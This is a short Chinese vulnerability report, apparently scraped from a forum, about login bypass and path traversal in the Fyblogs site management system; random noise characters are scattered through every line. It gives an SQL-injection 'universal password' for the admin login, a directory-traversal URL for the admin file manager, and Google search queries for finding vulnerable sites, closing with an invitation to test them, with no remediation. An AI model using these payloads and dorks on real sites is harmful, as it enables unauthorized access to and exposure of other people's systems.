漏洞类型: 未授权访问/权限绕过
$ r+ ]5 @2 }3 y; q1 F' {+ {' b" x+ p
简要描述:/ w+ B; F3 k( A
4 p; w$ L7 R9 k, p9 vFyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!4 @0 Y0 l8 y$ w8 q; _9 ]: ~
, C. s- P9 G8 Y8 Q1 f详细说明:
1 V5 j h/ p# I: U" d. h) { L" a' Q
后台万能密码 'or'='or'
/ h! {" L# |9 C8 P N后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!0 h7 E2 }! k7 \# Q% j+ G: V. u2 ]) `
admin/uploadfile.asp?currentFolder=/upfiles/../- ]- K, m, A' K0 ?4 v
6 i/ {7 h' Y) ?漏洞证明:9 X3 D/ k, U+ r, F" z) q
; W) ]4 O5 r# t4 E- G A) u
谷歌:inurl:type.asp?id=1 新闻中心
* f6 e+ J' B& Q# m- `/ w0 B或者 :inurl:download_ok.asp?$ l- F0 n2 q* B3 @+ w, G* u
# B' T' Y( V2 Q T1 ]
可以测试
& I) ]. [& ^0 q/ f* a! v
5 D$ v A6 K: U X
0 E6 A* U; {6 j( O; i |